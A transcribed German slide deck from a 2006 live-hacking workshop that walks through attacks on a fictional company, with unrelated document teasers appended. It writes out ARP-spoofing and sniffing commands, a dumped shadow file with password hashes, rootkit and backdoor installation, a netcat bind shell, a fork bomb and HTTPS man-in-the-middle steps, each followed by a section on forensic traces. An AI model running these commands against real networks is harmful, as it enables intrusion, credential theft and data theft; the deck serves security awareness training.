14 = \ r\/\/ 8z / 3u55

Größe: px
Ab Seite anzeigen:

Download "14 = \ r\/\/ 8z / 3u55"

Transkript

1 14 = \ r\/\/ 8z / 3u55 4R u / 9 /\/\4 / 1P _ / \/0 / )473 / 00. 4Pr1l _1\/3-4x0ring /\/\4r71 / 9. \/\/u / dr4/\/\ \/\/u / / 1(9 _ 4Rd.(0/\/\ Martin G. Wundram Zur AGENDA Seite: 1

2 IAF NRW BZ Neuss Arbeitstagung Manipulation von Daten 19. April 2006 Live Hacking Martin G. Wundram Martin G. Wundram Zur AGENDA Seite: 2

3 Agenda I.Begrüßung und Braingym II.Was macht TronicGuard? III.Fallbeschreibung: Deutsche-Top-Technologie GmbH IV.Das Netzwerk ausspähen LAN-Angriffe Internet-Angriffe 1.MITM abfangen 2.Physischer Angriff 3.MITM HTTPS-Login abfangen 4.SSHD mit Passwortlogging 5.Shell-Bombe Bonus-Angriffe 16.TinyPHPForum 17.PHPWebsite 18.MS-DNS-Redirect 6.DB-Server kompromittieren 7.Windows XP kompromittieren 8.Frame-Hijacking 9.JavaScript-Injection 10.Ebay Account phishen 11.Eine box r00ten 12.DOS-Angriff gegen SSHD 13.DOS gegen aktive Firewall 14.IDS lahmlegen 15.Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 3

4 Über mich Geschäftsführender Gesellschafter der TronicGuard GmbH 24 Jahre alt Vordiplom Wirtschaftsinformatik Ich freue mich auf die Begegnung mit Ihnen Und bin auch nach dem Vortrag jederzeit erreichbar. Am besten per Mail an: Martin G. Wundram Zur AGENDA Seite: 4

5 Braingym Stefan, Jan, Tim, Iris, Erika und Heide sind im Garten. Plötzlich zieht ein Gewitter auf; es grollt bedrohlich. Die Jungen rennen ins Haus. Doch keine der drei anderen folgt ihnen. Warum nicht? Martin G. Wundram Zur AGENDA Seite: 5

6 Über uns / Braingym Iris, Erika und Heide sind Pflanzen! Komplexe Themen einfach erschließen Bei Unklarheiten jederzeit nachfragen Im gemeinsamen Dialog Antworten erarbeiten Martin G. Wundram Zur AGENDA Seite: 6

7 Martin G. Wundram Zur AGENDA Seite: 7

8 Martin G. Wundram Zur AGENDA Seite: 8

9 Thinkgeek.com: Internet urinal Martin G. Wundram Zur AGENDA Seite: 9

10 Über die Präsentation Überblick: - Gewinnung von Informationen über Netzwerke - Netzwerküberwachung mit Linux - Konzeptionelle und konkrete Sicherheitslücken ausnutzen - Angreifen von innen und von aussen Die Themen können nur eine Anregung geben Thema uninteressant? Überspringen! Martin G. Wundram Zur AGENDA Seite: 10

11 Agenda III.Fallbeschreibung: Deutsche-Top-Technologie GmbH IV.Das Netzwerk ausspähen LAN-Angriffe 1.MITM abfangen 2.Physischer Angriff 3.MITM HTTPS-Login abfangen 4.SSHD mit Passwortlogging 5.Shell-Bombe Bonus-Angriffe 16.TinyPHPForum 17.PHPWebsite 18.MS-DNS-Redirect Internet-Angriffe 6.DB-Server kompromittieren 7.Windows XP kompromittieren 8.Frame-Hijacking 9.JavaScript-Injection 10.Ebay Account phishen 11.Eine box r00ten 12.DOS-Angriff gegen SSHD 13.DOS gegen aktive Firewall 14.IDS lahmlegen 15.Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 11

12 Was macht TronicGuard? Internet Service Provider IT-Infrastruktur: Firewalls, File-Server, Backup-Server,... Webentwicklung, Content Management Systeme Training Sachverständigentätigkeit im Bereich Unix-Systeme Support für FreeBSD und OpenBSD Martin G. Wundram Zur AGENDA Seite: 12

13 Fallbeschreibung: Deutsche-Top-Technologie GmbH Wer wir sind (Ihre fiktive Rolle im Unternehmen): Seit kurzem Projektleiter in der Kreativ-Abteilung (Aussenstelle) der DTT GmbH. Was die DTT GmbH macht: Technologieunternehmen, betreibt Grundlagenforschung im Sanitärbereich ->Fantasieunternehmen! Martin G. Wundram Zur AGENDA Seite: 13

14 Fallbeschreibung: Deutsche-Top-Technologie GmbH Was wir machen: Mit 12 Mitarbeitern neue Geschäftsideen entwickeln. Ein Administrator betreut die vorhandenen Computer. Unsere Idee: Das wertvolle Know-How der Firma stehlen und gewinnbringend an die Konkurrenz verkaufen. Martin G. Wundram Zur AGENDA Seite: 14

15 Fallbeschreibung: Deutsche-Top-Technologie GmbH Das wissen wir: Permanter Internetzugang Alles Wichtige in der Datenbank unserer Aussenstelle Der Inhalt wichtiger s wird mit einem speziellen Programm verschlüsselt, wenn wertvolle Geschäftsgeheimnisse an die Zentrale gesendet werden Unser PC startet Windows XP Helix o.ä. haben wir mitgebracht Martin G. Wundram Zur AGENDA Seite: 15

16 Das Netzwerk ausspähen??????????????? Wo sind wir? Wer sind wir? Gibt es Andere, und wer sind die? Was können wir über das Netzwerk und seine angeschlossenen Geräte erfahren? Infrastruktur! Martin G. Wundram Zur AGENDA Seite: 16

17 Das Netzwerk ausspähen z.b. von Windows XP aus: Eigene IP-Adresse, Subnetz-Maske, Standardgateway und DNS-Server notieren (cmd -> ipconfig -> nslookup) Traceroute ins Internet um weitere Gateways und Router hinter dem Default-Gateway zu finden (cmd -> tracert <host>) Einstellungen im Browser auf Proxy-Konfiguration prüfen Wichtig: Den eigenen Computer auf DHCP-Adressvergabe stellen! Martin G. Wundram Zur AGENDA Seite: 17

18 Das Netzwerk ausspähen Ist das Netzwerk geswitcht, oder wird ein Hub verwendet? -> Traffic im promiscuous-mode sniffen (tcpdump, urlsnarf, ettercap o.ä. verwenden) HUB? SWITCH? ??? MAC A Ethernet-Frame: MAC A -> MAC D MAC B MAC C MAC D Martin G. Wundram Zur AGENDA Seite: 18

19 Das Netzwerk ausspähen Computer 1 Computer 2 Ethernet-Frame: MAC A -> MAC D TCP/IP-Referenzmodell Martin G. Wundram Zur AGENDA Seite: 19

20 Das Netzwerk ausspähen Encapsulation / Kapselung Martin G. Wundram Zur AGENDA Seite: 20

21 Das Netzwerk ausspähen Promiscuous mode Netzwerkkarten können in den promiscuous mode gesetzt werden Martin G. Wundram Zur AGENDA Seite: 21

22 Das Netzwerk ausspähen UNIXoide Systeme haben eingebaute Hilfen: man <genaues suchwort> apropos <teilwort> Nutzen Sie diese!! tcpdump: Gibt die Header von Paketen eines Netzwerkinterfaces aus. Kann durch Filter konfiguriert werden. Ein Unix-Standardtool. Nutzt das Interface bpf (Berkley Packet Filter). man tcpdump. Martin G. Wundram Zur AGENDA Seite: 22

23 Das Netzwerk ausspähen SWITCH oder HUB? Martin G. Wundram Zur AGENDA Seite: 23

24 Das Netzwerk ausspähen Andere Geräte im Netzwerk finden und deren Dienste und ihr Betriebsystem prüfen: nmap -v -O nmap: Nmap network exploration tool and security scanner. man nmap Bei Systemen, die nicht erkannt werden, telnet, netcat oder nmap -v -sv <host> auf offene Ports zur Informationsgewinnung. Router? Martin G. Wundram Zur AGENDA Seite: 24

25 Das Netzwerk ausspähen WAN / Internet DSL/ISDN-Router, Gateway und Firewall, OpenBSD Switch Fileserver, SuSE Linux Unser Hacker-PC, Helix Interne Datenbank und Webserver, FreeBSD 12 Windows XP Clients (Der Administrator und die übrigen Mitarbeiter) Martin G. Wundram Zur AGENDA Seite: 25

26 Das Netzwerk ausspähen Spuren? Promiscuous-Mode kann erkannt werden (ARP-Tests) Scannen kompletter Subnets kann von NIDS (Network Intrusion Detection System, z.b. snort) bemerkt werden Vollständige Verbindungen auf offene Ports (z.b. mit netcat) hinterlassen Logfile-Einträge: May 14 15:52:37 linuxbox sshd[3820]: Did not receive identification string from Martin G. Wundram Zur AGENDA Seite: 26

27 Angriff 1: s abfangen und Verschlüsselung knacken Beschreibung Wir wissen, dass der Abteilungsleiter Herr Meier in Kürze eine Produktstudie per an die Zentrale senden wird. Daher vergiften wir seinen ARP-Cache und den des Gateways, Können voll-duplex seine Daten mithören und Die abfangen Anschließend: Verschlüsselte knacken Martin G. Wundram Zur AGENDA Seite: 27

28 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen Wie können Daten in einem geswitchen LAN abgehört werden? SWITCH :40:63:ca:b9:42 Sniffer 00:40:63:c1:1c:cc Switches erkennen das Ziel eines Datenpakets anhand der Ziel-MAC (Media Access Control) und stellen es nur diesem Ziel zu: Punkt-zu-Punkt-Verbindung Martin G. Wundram Zur AGENDA Seite: 28

29 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen arpspoof (ARP-Poisoning) Switch WAN / Internet Opfer MAC A ARP-Tabelle des Opfers: IP Gateway -> MAC C Sniffer MAC B Gateway MAC C Gezieltes Manipulieren eines einzelnen Hosts zur Überwachung Martin G. Wundram Zur AGENDA Seite: 29

30 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen arpspoof (ARP-Poisoning) Switch WAN / Internet Opfer MAC A ARP-Tabelle des Opfers: IP Gateway -> MAC B Sniffer MAC B Gateway MAC C Martin G. Wundram Zur AGENDA Seite: 30

31 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen ARP ist ein verbindungsloses Protokoll -Computer speichern gemeldete Einträge (Reply) auch ohne diese vorher angefragt zu haben (Request) -Permanente ARP-Replies an das Opfer(Antwortpake) mit Zuordnung: IP-des-Gateway <-> MAC-des-Sniffers Konsequenz: Daten werden vom Opfer nicht mehr an das Gateway, sondern an den Sniffer gesendet Manipulation lediglich auf Ethernet-Ebene! Martin G. Wundram Zur AGENDA Seite: 31

32 Angriff 1: s abfangen und Verschlüsselung knacken Die abfangen (Von: Helix) IP-Forwarding aktivieren echo 1 > /proc/sys/net/ipv4/ip_forward Herrn Meier's PC vergiften arpspoof -t IP_OPFER IP_GATEWAY Das Gateway vergiften arpspoof -t IP_GATEWAY IP_OPFER Herrn Meier's s abfangen tethereal -V "host IP_OPFER && port 25" tee sniffed.messages Martin G. Wundram Zur AGENDA Seite: 32

33 Angriff 1: s abfangen und Verschlüsselung knacken Die auswerten (Von: Helix oder Windows) Der Inhalt der Mail liegt im Rohformat in sniffed.messages vor Die Mail ist, wie erwartet, verschlüsselt Herr Meier schreibt keine Großbuchstaben und endet alle seine s wie folgt: herr meier deutsche-top-technologie gmbh Knacken Sie die Mail! Martin G. Wundram Zur AGENDA Seite: 33

34 Angriff 1: s abfangen und Verschlüsselung knacken Spuren? Die ARP-Tabelle der vergifteten Hosts ändert sich temporär ARP-Spoofing kann von einem NIDS zum Beispiel mit dem Tool arpwatch erkannt und gemeldet werden Martin G. Wundram Zur AGENDA Seite: 34

35 Angriff 2: DB-Server kompromittieren und DB kopieren Beschreibung Der Datenbankserver der Aussenstelle ist von besonderem Interesse, da in der Datenbank das Know-How der Firma gespeichert ist. Unser Ziel: In den DB-Server eindringen und die DB kopieren. Was wir wissen: Auf dem Datenbankserver läuft ein Webserver. Als Datenbanksystem wird MySQL verwendet. Martin G. Wundram Zur AGENDA Seite: 35

36 Angriff 2: DB-Server kompromittieren und DB kopieren Martin G. Wundram Zur AGENDA Seite: 36

37 Angriff 2: DB-Server kompromittieren und DB kopieren Das Web-Frontend untersuchen Das Frontend wurde in PHP programmiert phpinfo.php liefert hier Informationen über den Webserver und die PHP-Umgebung ( phpinfo() ) Einzelne Unterpunkte werden als PHP-Datei mit der Endung.inc im Unterordner inc eingebunden Übergabe der gewünschten Datei per GET in include Beliebige andere Übergaben möglich: Martin G. Wundram Zur AGENDA Seite: 37

38 Angriff 2: DB-Server kompromittieren und DB kopieren Das Web-Frontend untersuchen at:!:12551:0:99999:7::: bin:*:8902:0:10000:::: daemon:*:8902:0:10000:::: ftp:*:8902:0:10000:::: games:*:8902:0:10000:::: lp:*:8902:0:10000:::: mail:*:8902:0:10000:::: man:*:8902:0:10000:::: mysql:!:12551:0:99999:7::: news:*:8902:0:10000:::: nobody:*:8902:0:10000:::: ntp:!:12551:0:99999:7::: postfix:!:12551:0:99999:7::: root:fg4re/3vax6aw:12551:0:10000:::: sshd:!:12551:0:99999:7::: uucp:*:8902:0:10000:::: wwwrun:*:8902:0:10000:::: achim:3bxoqijnpf3he:12551:0:99999:7:-1:: difficult:tgf0ouuomo3e6:12552:0:99999:7:-1:: elite:0ep61aoxfplr6:12552:0:99999:7:-1:: hacker:fzchoc7bouzns:12552:0:99999:7:-1:: quark:iwk7ky7u7akp2:12552:0:99999:7:-1:: Der Webserver läuft hier als User root und kann daher jede System- Datei öffnen! Martin G. Wundram Zur AGENDA Seite: 38

39 Angriff 2: DB-Server kompromittieren und DB kopieren Die Passwort-Hashes knacken Passwörter in Linux in der Vergangenheit per default mit 40Bit DES gehasht: root:fg4re/3vax6aw Die Passwörter mit john ermitteln John läuft unter Linux/Unix und Win32 Wörterbuch-Attacken mit Permutationen Brute-Force-Attacken (alle Kombinationen ausprobieren) Martin G. Wundram Zur AGENDA Seite: 39

40 Angriff 2: DB-Server kompromittieren und DB kopieren Die Passwort-Hashes knacken Sehr schnelle Wörterbuch- und Brute-Force-Attacken: DES: ~ Passwörter/Sekunde FreeBSD MD5: ~4300 P/s OpenBSD Blowfish: ~256 P/s NT LM DES: ~ P/s (1,7GHz-System, Intel Pentium-M) Hier: Worst-Case-Laufzeiten für DES: a-z, 4 Zeichen: 2,8s a-za-z0-9, 4 Zeichen: 92s a-za-z0-9, 6 Zeichen: 99h a-za-z0-9, 8 Zeichen: 43y Martin G. Wundram Zur AGENDA Seite: 40

41 Angriff 2: DB-Server kompromittieren und DB kopieren Einloggen und die Datenbank kopieren Als Root per SSH einloggen (z.b. mit putty von Windows aus) Die Datenbank in /var/lib/mysql mit tar/gzip komprimieren: tar -czf /var/datenbank.tgz /var/lib/mysql Abschließend die Datenbank kopieren (z.b. mit scp von Linux aus): scp /zielordner_auf_meinem_pc Martin G. Wundram Zur AGENDA Seite: 41

42 Angriff 2: DB-Server kompromittieren und DB kopieren Backdoor installieren Die DB soll regelmäßig kopiert werden, aber: Die Passwörter könnten sich ändern Eventuell wird der Webserver irgendwann sicher konfiguriert Daher: Backdoor installieren! Versteckter Remote-Zugriff als Root ohne Passwort Proofs of Concept: Martin G. Wundram Zur AGENDA Seite: 42

43 Angriff 2: DB-Server kompromittieren und DB kopieren Spuren? Beispiel (Debian Hack 2003): access_log speichert alle Zugriffe auf den Webserver: less /var/log/httpd-access.log utmp und wtmp speichern alle Logins: last und man wtmp SSH-Logins in /var/log/auth.log Die History-Funktion der Shell (bash) speichert die eingegebenen Befehle: history Martin G. Wundram Zur AGENDA Seite: 43

44 Angriff 2: DB-Server kompromittieren und DB kopieren Spuren? Die (hier sehr simple) Backdoor erscheint in der Prozess-Liste: ps aux Eintrag für den Start der Backdoor in Startup-Skripten Die atime (Zugriffs-Zeitstempel) wird für alle geöffneten Dateien/Ordner aktualisiert Martin G. Wundram Zur AGENDA Seite: 44

45 Angriff 3: Lokalen Zugriff ausnutzen und Root werden Beschreibung Es bietet sich die Gelegenheit, ungestört direkt an das OpenBSD-Gateway und an den Linux-Fileserver heranzutreten. Harter Reboot, um danach das Root-Passwort neu zu setzen Martin G. Wundram Zur AGENDA Seite: 45

46 Angriff 3: Lokalen Zugriff ausnutzen und Root werden OpenBSD-Gateway lokal Per Reset harten Neustart durchführen Am Boot-Prompt mit der Option boot -s Single-User-Mode starten Mit grep ^root /etc/master.passwd den alten Hash anzeigen und eventuell sichern Die /-Partition mit Schreibrechten re-mounten: mount -o rw / Mit passwd eine neues Passwort vergeben (z.b ) Neustarten Martin G. Wundram Zur AGENDA Seite: 46

47 Angriff 3: Lokalen Zugriff ausnutzen und Root werden Windows XP lokal Per Reset harten Neustart durchführen Mit Linux-LiveCD von CD starten Passwort-Rücksetzer aktivieren Das Admin-Passwort blanken Zugriff jetzt ohne Passwort möglich Alternativ: Bisheriges Passwort durch Neues überschreiben Martin G. Wundram Zur AGENDA Seite: 47

48 Angriff 3: Lokalen Zugriff ausnutzen und Root werden Spuren? Der Neustart wird ebenfalls in wtmp gespeichert: last uptime Das Dateisystem muss geprüft werden (fsck) Unter Umständen zeitintensiv Im schlimmsten Fall: Partition korrupt Zeitstempel und Signatur (MD5) der Passwortdatei ändern sich Martin G. Wundram Zur AGENDA Seite: 48

49 Angriff 4: Kompromittierung eines Windows XP-Systems Beschreibung Wir übernehmen hier die Rolle des ungeliebten Controllers, der ständig die Löhne senken will. Wir haben dass Gefühl, nicht besonders beliebt zu sein... Wir sitzen vor unserem PC mit Windows XP und ein Kollege schickt per Mail einen Link auf die Seite: Da wir auf Sicherheit achten, benutzen wir den Browser Firefox Martin G. Wundram Zur AGENDA Seite: 49

50 Angriff 4: Kompromittierung eines Windows XP-Systems Die Javaskript-Schwachstelle Durch eine Lücke im Firefox können wir per Javaskript eine Batchdatei auf dem Opfer-System anlegen und diese mit den Rechten des angemeldeten Benutzers ausführen. Das Batchfile lädt per FTP eine bösartige Programmdatei und belastendes Bildmaterial herunter und führt die Programmdatei dann aus. Danach werden bis auf die Bilder alle Spuren entfernt. Zusätzlich wird die Hosts-Datei manipuliert Martin G. Wundram Zur AGENDA Seite: 50

51 Angriff 4: Kompromittierung eines Windows XP-Systems Spuren? Der Browser cached die aufgerufene Seite Die DOS-Box ist kurze Zeit zu sehen Die gelöschten Dateien werden nicht überschrieben und könnten daher wiederhergestellt werden Der FTP-Download könnte vom Gateway protokolliert werden Eine lokale Firewall könnte den Vorgang erkennen und sogar unterbinden Die Manipulation der Hosts-Datei ist natürlich leicht zu erkennen Martin G. Wundram Zur AGENDA Seite: 51

52 Angriff 5: Frame-Hijacking Beschreibung Die DTT GmbH wickelt ihr Banking online bei der Sparkasse XY ab (PIN/TAN). Jeden Tag um 10:00 Uhr fragt Herr Meier den Kontostand ab und überweist fällige Rechnungen. Um diese Zeit schicken wir Ihm eine präparierte Mail mit einem verlockenden Link. Mit etwas Glück kann der Content-Frame gegen einen eigenen getauscht werden. Auch bei SSL-Verbindung ohne Warnung. (Betrifft u.a. Internet Explorer und Mozilla bis 1.7.2) Martin G. Wundram Zur AGENDA Seite: 52

53 Angriff 5: Frame-Hijacking Mozilla installieren! Martin G. Wundram Zur AGENDA Seite: 53

54 Angriff 5: Frame-Hijacking Spuren? Es wird eine weitere Website nachgeladen. Diese hinterlässt wie üblich Spuren im Verlauf, Cache, Proxy- Log, Proxy-Cache,... Martin G. Wundram Zur AGENDA Seite: 54

55 Angriff 6: JavaScript-Injection Beschreibung JavaScript-Injection: In Anlehnung an Angriff 2 wollen wir hier einer anfälligen Webseite bösartigen JavaScript-Code übergeben. Der Browser des Opfers führt diesen Code dann in der Sicherheitszone der betreffenden Website aus. Martin G. Wundram Zur AGENDA Seite: 55

56 Angriff 6: JavaScript-Injection Spuren? Log-entry im Webserver: [09/Sep/2004:20:22: ] "GET /inject/index.php?eingabe=%68%61%6c%6c%6f HTTP/1.1" [...] Wie üblich Spuren im Verlauf, Cache, Proxy-Log, Proxy-Cache,... Martin G. Wundram Zur AGENDA Seite: 56

57 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen Beschreibung Der durch die verdächtigen Aktivitäten der letzten Zeit verunsicherte Systemadministrator verwendet seinen Webmailer mittlerweile nur noch per SSL-geschützter Verbindung. Das Ziel ist, trotz SSL-Verbindung Benutzername und Kennwort des Administrators herauszufinden. ->dnsspoof, webmitm Martin G. Wundram Zur AGENDA Seite: 57

58 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen SSL-Zertifikat Zertifikat ausgestellt für FQDN! Martin G. Wundram Zur AGENDA Seite: 58

59 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen dnsspoof Access-Router WAN / Internet Firewall, DNS-Server 3. DNS-Reply: Opfer 1. Browser: https://www.infininet.de 2. DNS-Query: 4. Browser baut Verbindung auf zu: und zeigt an: https://www.infininet.de Martin G. Wundram Zur AGENDA Seite: 59

60 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen dnsspoof Access-Router WAN / Internet Firewall, DNS-Server 4. DNS-Reply: Opfer 1. Browser: https://www.infininet.de 2. DNS-Query: 5. Browser baut Verbindung auf zu: und zeigt an: https://www.infininet.de Hacker / MITM 3. Spoofed DNS-Reply: Hacker baut eigene SSL-Verbindung auf zu: Transparenter HTTP-Proxy zeigt Opferdaten im Klartext an Martin G. Wundram Zur AGENDA Seite: 60

61 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen Hintergrund Auflösung von FQDN --> IP ist Schwachstelle. Durch Manipulation dieser Zuordnung Umbiegen möglich. Zertifikate normalerweise für FQDN's ausgestellt. Manipulation auch z.b. durch geändertes hosts-file möglich. Keine Warnung, wenn das eigene Zertifikat vom Browser als gültig erkannt wird (z.b. Thawte, Verisign,...). Achtung bei Aufruf über IP: https:// Martin G. Wundram Zur AGENDA Seite: 61

62 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen IP-Forwarding echo 1 > /proc/sys/net/ipv4/ip_forward Arpspoof Opfer arpspoof -t Arpspoof Gateway arpspoof -t Datei anlegen host mit eintrag IP-HACKER dnsspoof ( man dnsspoof ) webmitm -dd Zertifikat erstellen (Den Anweisungen folgen) Martin G. Wundram Zur AGENDA Seite: 62

63 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen Spuren? Auf dem Client-PC: Unter Umständen keinerlei Spuren. Manipulation direkt im DNS-Server möglich. Evtl. (zwischen)gespeichertes Zertifikat. Auf dem eigentlichen Server: Die IP/Hostname des MITM- Systems statt des Opfer-Hosts. Martin G. Wundram Zur AGENDA Seite: 63

64 Angriff 8: Ebay Account phishen Beschreibung Jetzt wollen wir den privaten Ebay Account des Systemadministrators hacken. Eine vermeintliche E-Bay-Mail, die offensichtlich auf ebay.de verlinkt, in Wirklichkeit aber auf ein gefälschtes Login-Formular auf unserem eigenen Server verweist, wird hier wohl ausreichen... May/ html Martin G. Wundram Zur AGENDA Seite: 64

65 Angriff 9: Webserver hacken und Rootkit installieren Beschreibung Da die Software des Fileservers veraltet ist (SuSE Linux 8.0) haben wir es hier mit einem potentiell einfachen Ziel zu tun. Um an die Daten zu kommen, müssen wir Zugriff auf den Root- Account bekommen. Ein Rootkit sorgt dafür, dass wir auch in Zukunft bequemen Zugriff auf das System haben. Martin G. Wundram Zur AGENDA Seite: 65

66 Angriff 9: Webserver hacken und Rootkit installieren Systemzugriff erlangen Oft werden sehr schlechte Benutzername/Kennwort- Kombinationen wie admin/admin oder admin/1234 vergeben. SSH-Verbindung auf datenbank: ssh Kennwort h4cker und dann./ssh-brute passwords Oder wenn expect auf eigenem System installiert: ftp und ssh-brute und passwords downloaden Martin G. Wundram Zur AGENDA Seite: 66

67 Angriff 9: Webserver hacken und Rootkit installieren Userrechte erhöhen Uname -a -> Kernel Für so einen alten Kernel gibt es etliche local root exploits z.b. oder FTP-Download von Exploit auf dem Opfer-System kompilieren: gcc -o elflbl elflbl.c Exploit ausführen: chmod 755 elflbl; elflbl Martin G. Wundram Zur AGENDA Seite: 67

68 Angriff 9: Webserver hacken und Rootkit installieren Rootkit installieren Damit wir auch in Zukunft Root-Zugriff haben, ohne erneut in das System einbrechen zu müssen, installieren wir jetzt ein Rootkit. Vom Opfer-System FTP auf und Download von dk.tar.gz und inst -> Mit dk.tar.gz testen wir ob bereits ein SucKIT installiert ist -> Mit inst installieren wir ein eigenes SucKIT Martin G. Wundram Zur AGENDA Seite: 68

69 Angriff 9: Webserver hacken und Rootkit installieren Spuren? Datenauswertung des Systems machen! Martin G. Wundram Zur AGENDA Seite: 69

70 Angriff 10: DOS-Angriff gegen den sshd des Webservers Beschreibung Um zu verhindern, dass sich der Administrator während des Angriffs per SSH mit dem Server verbindet, zehren wir einfach alle Slots durch einen simplen DOS auf: 10x: ssh Jetzt nochmal: ssh Auszug aus /etc/ssh/sshd_config: MaxStartups 10 Martin G. Wundram Zur AGENDA Seite: 70

71 Angriff 10: DOS-Angriff gegen den sshd des Webservers Spuren? Reguläre Einträge für ssh-verbindungsversuche die durch einen timeout beendet wurden (LoginGraceTime {z.b. 120} beachten) Martin G. Wundram Zur AGENDA Seite: 71

72 Angriff 11: SSHD mit Passwortlogging Beschreibung: Erweiterte Systemprotokollierung Ein befreundeter Administrator bittet uns, während seines Urlaubs auf den zentralen Uni-Server aufzupassen. Wir nutzen die Gelegenheit um an ein paar Passwörter zu kommen. ssh Kennwort: mwadmin / root-kennwort: Jetzt auf Benutzerverbindungen warten: ssh Sniff-Datei: /root/passwoerter Martin G. Wundram Zur AGENDA Seite: 72

73 Angriff 12: Shell-Bombe Beschreibung Stillstand auf einem Unix-System erzeugen: ssh ulimit :(){ : :& };: Martin G. Wundram Zur AGENDA Seite: 73

74 Angriff 13: DOS gegen aktive Firewall Beschreibung Manche Firewalls ergreifen aktiv Gegenmaßnahmen bei (vermeintlichen) Angriffen Proof of Concept: block in quick on $interface from <sshblock> to any pass in quick on $interface proto tcp from any port > 1023 to $interface2 \ port 22 keep state \ (max-src-conn 10, max-src-conn-rate 5/15, overload <sshblock> flush) Test mit lokaler Firewall Martin G. Wundram Zur AGENDA Seite: 74

75 Angriff 14: IDS lahmlegen Beschreibung (N)IDS (Network) Intrusion Detection Systems versuchen sicherheitsrelevante Vorfälle zu erkennen und u.u. sogar Gegenmaßnahmen durchzuführen Sensoren versorgen diese Systeme mit den nötigen Daten/Datenpaketen Um ungestört und unerkannt im Netz der DTT zu arbeiten, werden wir die Sensoren jetzt ausschalten Martin G. Wundram Zur AGENDA Seite: 75

76 Angriff 14: IDS lahmlegen Proof of Concept tcpdump als Sensor downloaden Kompilieren: gcc -o xtcpdump-bgp-dos xtcpdump-bgp-dos.c Ausführen:./xtcpdump-bgp-dos Lists/securityfocus/bugtraq/ /0448.html Martin G. Wundram Zur AGENDA Seite: 76

77 Angriff 15: Versteckter Datenkanal Beschreibung Der Administrator der DTT hat wegen der vielen Sicherheitsvorfälle in der letzten Zeit direkten Zugriff ins Internet gesperrt. Connectivity jetzt nur noch durch einen HTTP-Proxy Wie können wir doch noch unsere eigenen Netzwerkprotokolle und unsere eigenen Server erreichen?? Martin G. Wundram Zur AGENDA Seite: 77

78 Angriff 15: Versteckter Datenkanal httptunnel Bidirektionale, getunnelte Verbindung in HTTP-Requests Der Client übermittelt einen POST und erhält darauf eine Antwort. An den jeweiligen Strom werden nachfolgende Daten angehängt. Martin G. Wundram Zur AGENDA Seite: 78

79 Angriff 15: Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 79

80 Angriff 15: Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 80

81 Angriff 15: Versteckter Datenkanal Httptunnel verwenden Telnet-Server bauen (telnetd nicht in Knoppix-STD enthalten): nc -l -e /bin/bash -p 9100 httptunnel-serverkomponente starten: hts -F localhost: httptunnel-clientkomponente starten: htc -F 23 localhost:80 Ethereal starten: ethereal (Interface lo, nach dem capture: Display-Filter http) Telnet-Verbindung starten : nc localhost 23 Martin G. Wundram Zur AGENDA Seite: 81

82 Angriff 16: TinyPHPForum Beschreibung Googlen: powered tinyphpforum Beispiel1: Beispiel2: Martin G. Wundram Zur AGENDA Seite: 82

83 Angriff 17: PHPWebsite Beschreibung Martin G. Wundram Zur AGENDA Seite: 83

84 Angriff 17: PHPWebsite Beschreibung Martin G. Wundram Zur AGENDA Seite: 84

85 Angriff 17: PHPWebsite Beschreibung Martin G. Wundram Zur AGENDA Seite: 85

86 G e s c h a f f t! V i e l e n D a n k u n d b i s b a l d! Martin G. Wundram Zur AGENDA Seite: 86

IAF NRW BZ Neuss Daten abfangen in IP-basierten Netzen. IAF NRW BZ Neuss. 22. September 2004. Daten abfangen in IP-basierten Netzen

IAF NRW BZ Neuss Daten abfangen in IP-basierten Netzen. IAF NRW BZ Neuss. 22. September 2004. Daten abfangen in IP-basierten Netzen IAF NRW BZ Neuss 22. September 2004 Daten abfangen in IP-basierten Netzen Martin G. Wundram wundram@tronicguard.com Martin G. Wundram Seite: 1 Agenda >> 0 Begrüßung und Braingym I Daten abfangen im Internet

Mehr

Remote Tools. SFTP Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de

Remote Tools. SFTP Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de Remote Tools SSH SCP Proxy SFTP Port X11 christina.zeeh@studi.informatik.uni-stuttgart.de Grundlagen IP-Adresse 4x8 = 32 Bit Unterteilung des Adressraumes in Subnetze (Uni: 129.69.0.0/16) 129.69.212.19

Mehr

Remote Tools SFTP. Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de

Remote Tools SFTP. Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de Proxy Remote Tools SFTP SSH X11 Port SCP christina.zeeh@studi.informatik.uni-stuttgart.de Inhalt Grundlagen SSH Remote-Login auf marvin Datentransfer Graphische Anwendungen Tunnel VPN SSH für Fortgeschrittene

Mehr

WordPress lokal mit Xaamp installieren

WordPress lokal mit Xaamp installieren WordPress lokal mit Xaamp installieren Hallo und willkommen zu einem weiteren Teil der WordPress Serie, in diesem Teil geht es um die Lokale Installation von WordPress mithilfe von Xaamp. Kurz und knapp

Mehr

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung 6. Zone Defense 6.1 Einleitung Im Folgenden wird die Konfiguration von Zone Defense gezeigt. Sie verwenden einen Rechner für die Administration, den anderen für Ihre Tests. In der Firewall können Sie entweder

Mehr

TimeMachine. Time CGI. Version 1.5. Stand 04.12.2013. Dokument: time.odt. Berger EDV Service Tulbeckstr. 33 80339 München

TimeMachine. Time CGI. Version 1.5. Stand 04.12.2013. Dokument: time.odt. Berger EDV Service Tulbeckstr. 33 80339 München Time CGI Version 1.5 Stand 04.12.2013 TimeMachine Dokument: time.odt Berger EDV Service Tulbeckstr. 33 80339 München Fon +49 89 13945642 Mail rb@bergertime.de Versionsangaben Autor Version Datum Kommentar

Mehr

